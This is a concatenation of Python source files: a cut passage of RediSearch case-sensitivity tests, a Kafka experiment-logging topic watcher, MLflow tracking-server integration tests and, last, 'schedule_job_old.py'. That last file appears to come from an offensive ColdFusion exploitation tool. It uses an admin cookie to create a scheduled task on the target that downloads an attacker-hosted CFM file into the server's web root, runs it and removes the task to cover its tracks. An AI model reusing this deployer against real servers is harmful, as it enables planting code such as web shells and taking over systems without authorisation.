env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'N').equal([1L, 'doc4', []])
# make sure SORTBY are case sensitive
conn.execute_command('hset', 'doc7', 'n', '1.1')
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'n').equal([2L, 'doc4', ['n', '1.0'], 'doc7', ['n', '1.1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'N').error().contains('not loaded nor in schema')
# make sure aggregation load are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n').equal([1L, ['n', '1'], ['n', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@N').equal([1L, [], []])
# make sure aggregation apply are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'apply', '@n', 'as', 'r').equal([1L, ['n', '1', 'r', '1'], ['n', '1.1', 'r', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'apply', '@N', 'as', 'r').error().contains('not loaded in pipeline')
# make sure aggregation filter are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'filter', '@n==1.0').equal([1L, ['n', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'filter', '@N==1.0').error().contains('not loaded in pipeline')
# make sure aggregation groupby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'groupby', '1', '@n', 'reduce', 'count', 0, 'as', 'count').equal([2L, ['n', '1', 'count', '1'], ['n', '1.1', 'count', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'groupby', '1', '@N', 'reduce', 'count', 0, 'as', 'count').error().contains('No such property')
# make sure aggregation sortby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'sortby', '1', '@n').equal([2L, ['n', '1'], ['n', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'LOAD', '1', '@n', 'sortby', '1', '@N').error().contains('not loaded')
def testSortedFieldsCaseSensetive(env):
# this test will not pass on coordinator coorently as if one shard return empty results coordinator
# will not reflect the errors
env.skipOnCluster()
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC SORTABLE f TEXT SORTABLE t TAG SORTABLE g GEO SORTABLE')
# make sure text fields are case sesitive
conn.execute_command('hset', 'doc1', 'F', 'test')
conn.execute_command('hset', 'doc2', 'f', 'test')
env.expect('ft.search idx @f:test').equal([1L, 'doc2', ['f', 'test']])
env.expect('ft.search idx @F:test').equal([0])
# make sure numeric fields are case sesitive
conn.execute_command('hset', 'doc3', 'N', '1.0')
conn.execute_command('hset', 'doc4', 'n', '1.0')
env.expect('ft.search', 'idx', '@n:[0 2]').equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@N:[0 2]').equal([0])
# make sure tag fields are case sesitive
conn.execute_command('hset', 'doc5', 'T', 'tag')
conn.execute_command('hset', 'doc6', 't', 'tag')
env.expect('ft.search', 'idx', '@t:{tag}').equal([1L, 'doc6', ['t', 'tag']])
env.expect('ft.search', 'idx', '@T:{tag}').equal([0])
# make sure geo fields are case sesitive
conn.execute_command('hset', 'doc8', 'G', '-113.524,53.5244')
conn.execute_command('hset', 'doc9', 'g', '-113.524,53.5244')
env.expect('ft.search', 'idx', '@g:[-113.52 53.52 20 mi]').equal([1L, 'doc9', ['g', '-113.524,53.5244']])
env.expect('ft.search', 'idx', '@G:[-113.52 53.52 20 mi]').equal([0])
# make sure search filter are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'n', 0, 2).equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'N', 0, 2).equal([0])
# make sure RETURN are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'n').equal([1L, 'doc4', ['n', '1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'N').equal([1L, 'doc4', []])
# make sure SORTBY are case sensitive
conn.execute_command('hset', 'doc7', 'n', '1.1')
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'n').equal([2L, 'doc4', ['n', '1.0'], 'doc7', ['n', '1.1']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'SORTBY', 'N').error().contains('not loaded nor in schema')
# make sure aggregation apply are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'apply', '@n', 'as', 'r').equal([1L, ['n', '1', 'r', '1'], ['n', '1.1', 'r', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'apply', '@N', 'as', 'r').error().contains('not loaded in pipeline')
# make sure aggregation filter are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'filter', '@n==1.0').equal([1L, ['n', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'filter', '@N==1.0').error().contains('not loaded in pipeline')
# make sure aggregation groupby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'groupby', '1', '@n', 'reduce', 'count', 0, 'as', 'count').equal([2L, ['n', '1', 'count', '1'], ['n', '1.1', 'count', '1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'groupby', '1', '@N', 'reduce', 'count', 0, 'as', 'count').error().contains('No such property')
# make sure aggregation sortby are case sensitive
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'sortby', '1', '@n').equal([2L, ['n', '1'], ['n', '1.1']])
env.expect('ft.aggregate', 'idx', '@n:[0 2]', 'sortby', '1', '@N').error().contains('not loaded')
def testScoreLangPayloadAreReturnedIfCaseNotMatchToSpecialFields(env):
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC SORTABLE')
conn.execute_command('hset', 'doc1', 'n', '1.0', '__Language', 'eng', '__Score', '1', '__Payload', '10')
res = env.cmd('ft.search', 'idx', '@n:[0 2]')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'doc1', ['n', '1.0', '__Language', 'eng', '__Score', '1', '__Payload', '10']]))
def testReturnSameFieldDifferentCase(env):
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC SORTABLE N NUMERIC SORTABLE')
conn.execute_command('hset', 'doc1', 'n', '1.0', 'N', '2.0')
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '2', 'n', 'N').equal([1L, 'doc1', ['n', '1', 'N', '2']])
def testCreateIfNX(env):
env.expect('FT._CREATEIFNX idx ON HASH SCHEMA n NUMERIC SORTABLE N NUMERIC SORTABLE').ok()
env.expect('FT._CREATEIFNX idx ON HASH SCHEMA n NUMERIC SORTABLE N NUMERIC SORTABLE').ok()
def testDropIfX(env):
env.expect('FT._DROPIFX idx').ok()
def testDeleteIfX(env):
env.expect('FT._DROPINDEXIFX idx').ok()
def testAlterIfNX(env):
env.expect('FT.CREATE idx ON HASH SCHEMA n NUMERIC').ok()
env.expect('FT._ALTERIFNX idx SCHEMA ADD n1 NUMERIC').ok()
env.expect('FT._ALTERIFNX idx SCHEMA ADD n1 NUMERIC').ok()
res = env.cmd('ft.info idx')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}['fields']
env.assertEqual(res, [['n', 'type', 'NUMERIC'], ['n1', 'type', 'NUMERIC']])
def testAliasAddIfNX(env):
env.expect('FT.CREATE idx ON HASH SCHEMA n NUMERIC').ok()
env.expect('FT._ALIASADDIFNX a1 idx').ok()
env.expect('FT._ALIASADDIFNX a1 idx').ok()
def testAliasDelIfX(env):
env.expect('FT._ALIASDELIFX a1').ok()
def testEmptyDoc(env):
conn = getConnectionByEnv(env)
env.expect('FT.CREATE idx SCHEMA t TEXT').ok()
env.expect('FT.ADD idx doc1 1 FIELDS t foo').ok()
env.expect('FT.ADD idx doc2 1 FIELDS t foo').ok()
env.expect('FT.ADD idx doc3 1 FIELDS t foo').ok()
env.expect('FT.ADD idx doc4 1 FIELDS t foo').ok()
env.expect('FT.SEARCH idx * limit 0 0').equal([4])
conn.execute_command('DEL', 'doc1')
conn.execute_command('DEL', 'doc3')
env.expect('FT.SEARCH idx *').equal([2L, 'doc4', ['t', 'foo'], 'doc2', ['t', 'foo']])
def testInvertedIndexWasEntirelyDeletedDuringCursor():
env = Env(moduleArgs='GC_POLICY FORK FORK_GC_CLEAN_THRESHOLD 1')
env.skipOnCluster()
env.expect('FT.CREATE idx SCHEMA t TEXT').ok()
env.expect('HSET doc1 t foo').equal(1)
env.expect('HSET doc2 t foo').equal(1)
res, cursor = env.cmd('FT.AGGREGATE idx foo WITHCURSOR COUNT 1')
env.assertEqual(res, [1L, []])
# delete both documents and run the GC to clean 'foo' inverted index
env.expect('DEL doc1').equal(1)
env.expect('DEL doc2').equal(1)
env.cmd('FT.DEBUG GC_FORCEINVOKE idx')
# make sure the inverted index was cleaned
env.expect('FT.DEBUG DUMP_INVIDX idx foo').error().contains('not find the inverted index')
# read from the cursor
res, cursor = env.cmd('FT.CURSOR READ idx %d' % cursor)
env.assertEqual(res, [0L])
env.assertEqual(cursor, 0)
def testNegativeOnly(env):
conn = getConnectionByEnv(env)
env.expect('FT.CREATE idx SCHEMA t TEXT').ok()
conn.execute_command('HSET', 'doc1', 'not', 'foo')
env.expect('FT.SEARCH idx *').equal([1L, 'doc1', ['not', 'foo']])
env.expect('FT.SEARCH', 'idx', '-bar').equal([1L, 'doc1', ['not', 'foo']])
def testNotOnly(env):
conn = getConnectionByEnv(env)
conn.execute_command('FT.CREATE', 'idx', 'SCHEMA', 'txt1', 'TEXT')
conn.execute_command('HSET', 'a', 'txt1', 'hello', 'txt2', 'world')
conn.execute_command('HSET', 'b', 'txt1', 'world', 'txt2', 'hello')
env.expect('ft.search idx !world').equal([1L, 'b', ['txt1', 'world', 'txt2', 'hello']])
|
topic_watcher.py
|
"""
This utility watches the "announce" topic on the Kafka broker and launches logging
consumers when a new announcement is made. This utility also is responsible for
maintaining the metadata database, which keeps track of the different runs.
Additionally, this tool reaps dead experiments - and marks them as complete in the
main tab.
"""
import atexit
import datetime
import logging
import multiprocessing
import os
import time
import msgpack
import tinydb
from confluent_kafka import Consumer, KafkaException
from confluent_kafka.admin import AdminClient, NewTopic
from madera.globals import MType
from madera.util import mkdir_p, sanitize_path
from madera.consumer.topic_listener import launch_topic_listener
_PROC_DB = {} # type: ignore
def process_message(msg, run_db, data_directory, api_key, port, adm_cli):
global _PROC_DB # pylint: disable=global-statement
# Parse the message
message = msgpack.loads(msg, encoding='utf-8')
if 'type' not in message:
logging.error('Invalid message recieved')
return
if message['type'] == MType.ANNOUNCE_CREATE.value:
# Register the experiment and run
# Create and register the experiment
if not process_create_message(message, run_db, data_directory, api_key, port):
return
elif message['type'] == MType.ANNOUNCE_DIE.value:
process_disconnect_message(message, run_db, adm_cli)
def process_disconnect_message(message, run_db, adm_cli):
time.sleep(5)
# Get the experiment
experiment_table = run_db.table('experiments')
experiment_name = sanitize_path(message['experiment'])
exp = experiment_table.search(tinydb.where('experiment') == experiment_name)
if exp:
exp = exp[0]
else:
logging.warning(
'Tried to remove process from an experiment, but encountered an error in which the experiment is not real.')
try:
_PROC_DB[exp['experiment']][message['run_id']]['producers'].remove(message['rank_id'])
except KeyError:
logging.warning(
'Tried to remove rank producer from an experiment, but encountered an error in which the producer is not real.'
)
if not _PROC_DB[exp['experiment']][message['run_id']]['producers']:
# Remove the topic for the run
def remove_runid():
time.sleep(30)
atexit.unregister(_PROC_DB[exp['experiment']][message['run_id']]['process'].terminate)
_PROC_DB[exp['experiment']][message['run_id']]['process'].terminate()
# Update the run DB
logging.info('Setting runs to finished')
run_table = run_db.table('runs')
run_table.update({'finished': True}, tinydb.where('run_id') == message['run_id'])
try:
logging.info('Removing Kafka topic: {}'.format(message['run_id']))
results = adm_cli.delete_topics([message['run_id']])
for v in results.values():
v.result()
except KafkaException:
pass
multiprocessing.Process(target=remove_runid).start()
def process_create_message(message, run_db, data_directory, api_key, port):
# Register the experiment and run
# Create and register the experiment
if 'experiment' not in message or 'run_id' not in message or 'rank_id' not in message:
logging.error('Invalid creation announcement recieved')
return False
experiment_table = run_db.table('experiments')
experiment_name = sanitize_path(message['experiment'])
experiment = experiment_table.search(tinydb.where('experiment') == experiment_name)
if not experiment:
logging.info('Creating experiment: %s', experiment_name)
# Make a directory for the experiment
data_path = os.path.join(data_directory, experiment_name)
logging.info('Experiment data located at: %s', data_path)
mkdir_p(data_path)
# Create the experiment
experiment_table.insert({'experiment': experiment_name, 'data_path': data_path})
exp = experiment_table.search(tinydb.where('experiment') == experiment_name)[0]
else:
exp = experiment[0]
if exp['experiment'] not in _PROC_DB:
_PROC_DB[exp['experiment']] = {}
# Create and register the run ID
run_table = run_db.table('runs')
runs = run_table.search((tinydb.where('experiment') == experiment_name) &
(tinydb.where('run_id') == message['run_id']))
if not runs:
# Create the run
run_path = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S")
run_directory = os.path.join(data_directory, experiment_name, run_path)
mkdir_p(run_directory)
# Update the database
run_table.insert({
'experiment': experiment_name,
'run_id': message['run_id'],
'run_directory': run_directory,
'finished': False
})
run = run_table.search((tinydb.where('experiment') == experiment_name) &
(tinydb.where('run_id') == message['run_id']))[0]
else:
run = runs[0]
# Start the process
if message['run_id'] not in _PROC_DB[
exp['experiment']] or not _PROC_DB[exp['experiment']][message['run_id']].is_alive():
_PROC_DB[exp['experiment']][message['run_id']] = {
'process': multiprocessing.Process(target=launch_topic_listener, args=(
exp,
api_key,
run,
port,
)),
'producers': set(),
'finished': False,
}
_PROC_DB[exp['experiment']][message['run_id']]['process'].start()
atexit.register(_PROC_DB[exp['experiment']][message['run_id']]['process'].terminate)
_PROC_DB[exp['experiment']][message['run_id']]['producers'].add(message['rank_id'])
return True
def launch(api_key, port, data_directory=None, topic='announce'):
logging.basicConfig(level=logging.DEBUG)
# Initialize the database
if data_directory is None:
data_directory = os.getcwd()
db = tinydb.TinyDB(os.path.join(data_directory, 'run_db.json'))
logging.info('Constructing local consumer')
consumer = Consumer({
'bootstrap.servers': 'localhost:' + str(port),
'group.id': 0,
'auto.offset.reset': 'earliest',
'sasl.username': 'admin',
'sasl.password': api_key,
'security.protocol': 'sasl_plaintext',
'sasl.mechanism': 'PLAIN',
})
adm_client = AdminClient({
'bootstrap.servers': 'localhost:' + str(port),
'group.id': 0,
'auto.offset.reset': 'earliest',
'sasl.username': 'admin',
'sasl.password': api_key,
'security.protocol': 'sasl_plaintext',
'sasl.mechanism': 'PLAIN',
})
# Clean up the Kafka board
try:
results = adm_client.delete_topics(list(consumer.list_topics().topics.keys()))
for v in results.values():
v.result()
except ValueError:
pass
# Create the announce topic
try:
logging.info('Setting up announce topic')
tp_future = adm_client.create_topics([NewTopic('announce', 1, 1)])
tp_future['announce'].result() # Wait for the future
logging.info('Topic created!')
except KafkaException as ex:
logging.warning(ex)
logging.info('Connecting to topic: %s', topic)
consumer.subscribe([topic])
# Main consumer loop
while True:
msg = consumer.poll(0.1)
# Validate the message is good
if msg is None:
continue
if msg.error():
logging.error('Topic Consumer Error: %s', msg.error())
continue
logging.info('Processing Message')
process_message(msg.value(), db, data_directory, api_key, port, adm_client)
|
test_rest_tracking.py
|
"""
Integration test which starts a local Tracking Server on an ephemeral port,
and ensures we can use the tracking API to communicate with it.
"""
import mock
from multiprocessing import Process
import os
import pytest
import socket
import time
import tempfile
from click.testing import CliRunner
import mlflow.experiments
from mlflow.entities import RunStatus
from mlflow.protos.service_pb2 import LOCAL as SOURCE_TYPE_LOCAL
from mlflow.server import app, BACKEND_STORE_URI_ENV_VAR
from mlflow.tracking import MlflowClient
from mlflow.utils.mlflow_tags import MLFLOW_RUN_NAME, MLFLOW_PARENT_RUN_ID, MLFLOW_SOURCE_TYPE, \
MLFLOW_SOURCE_NAME, MLFLOW_PROJECT_ENTRY_POINT, MLFLOW_GIT_COMMIT
LOCALHOST = '127.0.0.1'
SERVER_PORT = 0
def _get_safe_port():
"""Returns an ephemeral port that is very likely to be free to bind to."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCALHOST, 0))
port = sock.getsockname()[1]
sock.close()
return port
def _await_server_up_or_die(port, timeout=60):
"""Waits until the local flask server is listening on the given port."""
print('Awaiting server to be up on %s:%s' % (LOCALHOST, port))
start_time = time.time()
connected = False
while not connected and time.time() - start_time < timeout:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((LOCALHOST, port))
if result == 0:
connected = True
else:
print('Server not yet up, waiting...')
time.sleep(0.5)
if not connected:
raise Exception('Failed to connect on %s:%s after %s seconds' % (LOCALHOST, port, timeout))
print('Server is up on %s:%s!' % (LOCALHOST, port))
# NB: We explicitly wait and timeout on server shutdown in order to ensure that pytest output
# reveals the cause in the event of a test hang due to the subprocess not exiting.
def _await_server_down_or_die(process, timeout=60):
"""Waits until the local flask server process is terminated."""
print('Awaiting termination of server process...')
start_time = time.time()
while process.is_alive() and time.time() - start_time < timeout:
time.sleep(0.5)
if process.is_alive():
raise Exception('Server failed to shutdown after %s seconds' % timeout)
@pytest.fixture(scope="module", autouse=True)
def init_and_tear_down_server(request):
"""
Once per run of the entire set of tests, we create a new server, and
clean it up at the end.
"""
global SERVER_PORT
SERVER_PORT = _get_safe_port()
file_store_path = tempfile.mkdtemp("test_rest_tracking_file_store")
env = {BACKEND_STORE_URI_ENV_VAR: file_store_path}
with mock.patch.dict(os.environ, env):
process = Process(target=lambda: app.run(LOCALHOST, SERVER_PORT))
process.start()
_await_server_up_or_die(SERVER_PORT)
# Yielding here causes pytest to resume execution at the end of all tests.
yield
print("Terminating server...")
process.terminate()
_await_server_down_or_die(process)
@pytest.fixture()
def tracking_server_uri():
"""Provides a tracking URI for communicating with the local tracking server."""
return "http://{hostname}:{port}".format(hostname=LOCALHOST, port=SERVER_PORT)
@pytest.fixture()
def mlflow_client(tracking_server_uri):
"""Provides an MLflow Tracking API client pointed at the local tracking server."""
return MlflowClient(tracking_server_uri)
@pytest.fixture()
def cli_env(tracking_server_uri):
"""Provides an environment for the MLflow CLI pointed at the local tracking server."""
cli_env = {
"LC_ALL": "en_US.UTF-8",
"LANG": "en_US.UTF-8",
"MLFLOW_TRACKING_URI": tracking_server_uri,
}
return cli_env
def test_create_get_list_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('My Experiment',
artifact_location='my_location')
exp = mlflow_client.get_experiment(experiment_id)
assert exp.name == 'My Experiment'
assert exp.artifact_location == 'my_location'
experiments = mlflow_client.list_experiments()
assert set([e.name for e in experiments]) == {'My Experiment'}
def test_delete_restore_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('Deleterious')
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
mlflow_client.delete_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
mlflow_client.restore_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_delete_restore_experiment_cli(mlflow_client, cli_env):
experiment_name = "DeleteriousCLI"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['delete', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['restore', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_rename_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('BadName')
assert mlflow_client.get_experiment(experiment_id).name == 'BadName'
mlflow_client.rename_experiment(experiment_id, 'GoodName')
assert mlflow_client.get_experiment(experiment_id).name == 'GoodName'
def test_rename_experiment_cli(mlflow_client, cli_env):
bad_experiment_name = "BadName"
good_experiment_name = "GoodName"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', bad_experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(bad_experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).name == bad_experiment_name
CliRunner(env=cli_env).invoke(
mlflow.experiments.commands,
['rename', str(experiment_id), good_experiment_name])
assert mlflow_client.get_experiment(experiment_id).name == good_experiment_name
def test_create_run_all_args(mlflow_client):
source_name = "Hello"
entry_point = "entry"
source_version = "abc"
create_run_kwargs = {
"user_id": "123",
"run_name": "My name",
"start_time": 456,
"tags": {
MLFLOW_SOURCE_TYPE: "LOCAL",
MLFLOW_SOURCE_NAME: source_name,
MLFLOW_PROJECT_ENTRY_POINT: entry_point,
MLFLOW_GIT_COMMIT: source_version,
MLFLOW_PARENT_RUN_ID: "7",
"my": "tag",
"other": "tag",
}
}
experiment_id = mlflow_client.create_experiment('Run A Lot')
created_run = mlflow_client.create_run(experiment_id, **create_run_kwargs)
run_id = created_run.info.run_uuid
print("Run id=%s" % run_id)
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id == create_run_kwargs["user_id"]
assert run.info.source_type == SOURCE_TYPE_LOCAL
assert run.info.source_name == source_name
assert run.info.entry_point_name == entry_point
assert run.info.start_time == create_run_kwargs["start_time"]
assert run.info.source_version == source_version
actual_tags = {t.key: t.value for t in run.data.tags}
for tag in create_run_kwargs["tags"]:
assert tag in actual_tags
assert actual_tags.get(MLFLOW_RUN_NAME) == create_run_kwargs["run_name"]
assert mlflow_client.list_run_infos(experiment_id) == [run.info]
def test_create_run_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Run A Little')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id is not None # we should pick some default
def test_log_metrics_params_tags(mlflow_client):
experiment_id = mlflow_client.create_experiment('Oh My')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
mlflow_client.log_metric(run_id, 'metric', 123.456)
mlflow_client.log_param(run_id, 'param', 'value')
mlflow_client.set_tag(run_id, 'taggity', 'do-dah')
run = mlflow_client.get_run(run_id)
metrics = {t.key: t.value for t in run.data.metrics}
params = {t.key: t.value for t in run.data.params}
tags = {t.key: t.value for t in run.data.tags}
assert metrics.get('metric') == 123.456
assert params.get('param') == 'value'
assert tags.get('taggity') == 'do-dah'
def test_set_terminated_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 1')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id)
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FINISHED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_set_terminated_status(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 2')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id, 'FAILED')
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FAILED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_artifacts(mlflow_client):
experiment_id = mlflow_client.create_experiment('Art In Fact')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
src_dir = tempfile.mkdtemp('test_artifacts_src')
src_file = os.path.join(src_dir, 'my.file')
with open(src_file, 'w') as f:
f.write('Hello, World!')
mlflow_client.log_artifact(run_id, src_file, None)
mlflow_client.log_artifacts(run_id, src_dir, 'dir')
root_artifacts_list = mlflow_client.list_artifacts(run_id)
assert set([a.path for a in root_artifacts_list]) == {'my.file', 'dir'}
dir_artifacts_list = mlflow_client.list_artifacts(run_id, 'dir')
assert set([a.path for a in dir_artifacts_list]) == {'dir/my.file'}
all_artifacts = mlflow_client.download_artifacts(run_id, '.')
assert open('%s/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
assert open('%s/dir/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
dir_artifacts = mlflow_client.download_artifacts(run_id, 'dir')
assert open('%s/my.file' % dir_artifacts, 'r').read() == 'Hello, World!'
|
schedule_job_old.py
|
from src.platform.coldfusion.interfaces import CINTERFACES
from src.platform.coldfusion.authenticate import checkAuth
from src.module.deploy_utils import _serve, waitServe, parse_war_path, killServe
from threading import Thread
from os.path import abspath
from re import findall
from time import sleep
from log import LOG
import utility
import state
title = CINTERFACES.CFM
versions = ['5.0', '6.0', '6.1']
def deploy(fingerengine, fingerprint):
""" Scheduled Task deployer for older versions; radically different
than newer systems, so it warrants its own deployer.
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0]
if not cookie:
utility.Msg("Could not get auth", LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
root = fetch_webroot(dip, fingerprint, cookie)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root, cookie):
return
# invoke the task
utility.Msg("Task %s created, invoking..." % cfm_file)
run_task(dip, fingerprint, cfm_path, cookie)
# cleanup
utility.Msg("Cleaning up...")
if not delete_task(dip, fingerprint, cfm_file, cookie):
utility.Msg("Failed to remove task. May require manual removal.", LOG.ERROR)
def create_task(ip, fingerprint, cfm_file, root, cookie):
""" Generate a new task; all parameters are necessary, unfortunately
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm'
if fingerprint.version in ['5.0']:
data = {
"taskNameOrig" : "",
"TaskName" : cfm_file,
"StartDate" : "01/01/2020",
"EndDate" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:05",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"Port" : state.external_port,
"ScheduledURL" : "http://{0}/{1}".format(utility.local_address(), cfm_file),
"Username" : "",
"Password" : "",
"RequestTimeout" : "10",
"ProxyServer" : "",
"HttpProxyPort" : "23",
"Publish" : "1",
"filePath" : root,
"File" : cfm_file.replace('cfml', 'cfm'),
"adminsubmit" : "Submit+Changes"
}
else:
data = {
"TaskName" : cfm_file,
"Start_Date" : "Jan 2, 2020",
"End_Date" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:50",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval_hour" : "0",
"customInterval_min" : "0",
"customInterval_sec" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file),
"Username" : "",
"Password" : "",
"Request_Time_out" : "",
"proxy_server" : "",
"http_proxy_port" : "",
"publish" : "1",
"publish_file" : root + "\\" + cfm_file,
"adminsubmit" : "Submit",
"taskNameOrig" : ""
}
response = utility.requests_post(base+uri, data=data, cookies=cookie)
if response.status_code is 200:
return True
def run_task(ip, fingerprint, cfm_path, cookie):
""" Invoke the task and wait for the server to fetch it
"""
success = False
cfm_file = parse_war_path(cfm_path, True)
# start up our listener
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/scheduler/runtask.cfm?task=%s' % cfm_file
else:
uri = '/CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=%s'\
% cfm_file
response = utility.requests_get(base + uri, cookies=cookie)
if waitServe(server_thread):
if fingerprint.version in ['5.0']:
out_diag = "{0} deployed to /{0}".format(cfm_file.replace('cfml','cfm'))
else:
out_diag = "{0} deployed to /CFIDE/{0}".format(cfm_file)
utility.Msg(out_diag, LOG.SUCCESS)
success = True
killServe()
return success
def delete_task(ip, fingerprint, cfm_file, cookie):
"""
"""
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/deletetask.cfm'
data = {
"deletesubmit" : "Yes",
"task" : cfm_file
}
response = utility.requests_post(base + uri, data=data, cookies=cookie)
if response.status_code is 200:
return True
def fetch_webroot(ip, fingerprint, cookie):
""" Fetch the webroot for the CF server; this is where our
payload is stashed
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = "/CFIDE/administrator/server_settings/mappings.cfm?mapname=/"
else:
uri = '/CFIDE/administrator/settings/mappings.cfm?mapname=/CFIDE'
response = utility.requests_get(base+uri, cookies=cookie)
if response.status_code is 200:
if fingerprint.version in ['5.0']:
data = findall("name=\"DirectoryPath\" value=\"(.*?)\"",
response.content)
if data and len(data) > 0:
data = data[0]
else:
data = findall("<td nowrap><font class=\"label\"> (.*?) ",
response.content)
if data and len(data) > 0:
data = data[1]
if data:
return data
|
assistant.py
|
